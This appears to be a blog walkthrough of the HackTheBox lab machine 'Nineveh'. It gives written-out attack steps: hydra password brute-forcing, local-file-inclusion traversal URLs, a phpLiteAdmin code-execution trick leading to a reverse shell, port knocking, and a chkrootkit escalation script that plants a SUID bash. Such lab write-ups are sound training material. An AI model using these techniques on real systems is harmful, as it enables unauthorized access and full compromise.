Summary

Nineveh is a medium Linux box that can be exploited by brute-forcing login credentials. This will lead you to a page that is vulnerable to a LFI vulnerability. Login credentials can then be brute-forced to authenticate to the phpLiteAdmin software after which you can create a new database with malicious php code that gets executed when used in combination with the LFI. A private key was found inside one of the images which can be combined with a port knock to obtain a lower privileged SSH shell. A cronjob is found which indicates chkrootkit is used, a public exploit was used to obtain a root shell.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.94.12
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

The user is presented with the following:

Gobuster found the following locations:

http://10.129.94.12/department/login.php
https://10.129.94.36/db
https://10.129.94.36/secure_notes/

The first page was vulnerable to username enumeration:

It also shows this comment in the response:

@admin! MySQL is been installed.. please fix the login page! ~amrois

Since you know the username you can brute-force the password. In this case hydra was used as it is relatively easy to configure and it is very fast. The following command was used to brute-force the login form:

In only 1 minute, Hydra managed to find the password:

[80][http-post-form] host: 10.129.94.12 login: admin password: 1q2w3e4r5t

After authenticating, the following page is shown:

This shows several hints. It also shows the following notes page: http://10.129.94.12/department/manage.php?notes=files/ninevehNotes.txt


Exploitation

This turned out to be vulnerable to a LFI inclusion vulnerability. The following request was issued:

http://10.129.94.12/department/manage.php?notes=files/ninevehNotes.php../../../../../../../etc/passwd

The passwd file was retrieved:

It was attempted to pull the user directly:

http://10.129.94.12/department/manage.php?notes=files/ninevehNotes.php../../../../../../../home/amrois/user.txt

However, this gives an error that the filename is too long. Switching back to the other directories from gobuster, the following page was found:

Authenticating with the previously discovered credentials does not work. Searchsploit shows the following available exploits:

However, all of these are authenticated. Therefore, hydra was used again with the following command:

hydra -P /usr/share/wordlists/rockyou.txt 10.129.94.12 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."

Hydra found it again:

Lets go back to the following exploit form searchsploit to get RCE as an authenticated user.

A database was created with the name ninevehNotes.txt.rce.php. The first part had to be in the DB name otherwise the LFI will keep displaying file name too long. Also, please note that you can’t use single quotes in the php code as this will mess with the SQL. In this case, it fetches a file named shell.txt which consists of a php reverse shell.
Then go to: http://10.129.94.36/department/manage.php?notes=/var/tmp/ninevehNotes.txt.rce.php
This will land you a reverse shell.


Privilege Escalation

Linpeas found a mail:

www-data@nineveh:/tmp$ cat /var/mail/amrois
From root@nineveh.htb  Fri Jun 23 14:04:19 2017
Return-Path: [root@nineveh.htb](mailto:root@nineveh.htb)
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: [20170623190419.D289B2E3587@nineveh.htb](mailto:20170623190419.D289B2E3587@nineveh.htb)
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)

Amrois! please knock the door next time! 571 290 911

Note that the text gives an indication of a port knocking possibility. Check the config with:

www-data@nineveh:/home/amrois$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens160

[openSSH]
 sequence = 571, 290, 911 
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn 

To open port 22 you can execute the following command:
knock 10.129.94.36 571, 290, 911
When you re-run Nmap you will see that it opened it:

nmap -p22 10.129.94.36
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 15:31 CET
Nmap scan report for 10.129.94.36
Host is up (0.011s latency).

PORT   STATE SERVICE
22/tcp open  ssh

However, when using SSH to authenticate, you are prompted for a password. It took a while to figure this out but go back to the notes from gobuster. The only page that was not checked so far is:
https://10.129.94.36/secure_notes/
You can go to this directory locally:

www-data@nineveh:/home/amrois$ locate secure_notes
/var/www/ssl/secure_notes
/var/www/ssl/secure_notes/index.html
/var/www/ssl/secure_notes/nineveh.png

Then run strings on all those files, you will find a private key in the .png one. Copy this over to a file on your localhost and authenticate over SSH with:
ssh -i nineveh-privatekey amrois@10.129.94.36
This gives you a lower privileged shell and you can cat user.txt.


Privilege Escalation

Run linpeas again, it will find the following:

Lets check that file:

amrois@nineveh:~$ strings /usr/sbin/report-reset.sh
#!/bin/bash
rm -rf /report/*.txt

Let’s check that directory:

amrois@nineveh:/report$ ls -la
total 24
drwxr-xr-x  2 amrois amrois 4096 Feb  8 08:41 .
drwxr-xr-x 24 root   root   4096 Jan 29 03:34 ..
-rw-r--r--  1 amrois amrois 4838 Feb  8 08:40 report-21-02-08:08:40.txt
-rw-r--r--  1 amrois amrois 4838 Feb  8 08:41 report-21-02-08:08:41.txt
[...]

When you throw some of the contect into google you will find a lot of information regarding chkrootkit. Searchsploit has the following modules for this:

Chkrootkit 0.49 - Local Privilege Escalation                | linux/local/33899.txt

You can create a file named update and make sure it’s executable. I used the following contents:

#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash

When the cronjob is run it will create the file rootbash after which you can execute this to get a rootshell: /tmp/rootbash -p


Conclusion

This was a really fun box. Obtaining the private key was rather tricky but apart from that it was relativiely straightforward and learned a lot from doing this. Hope you enjoyed this walkthrough!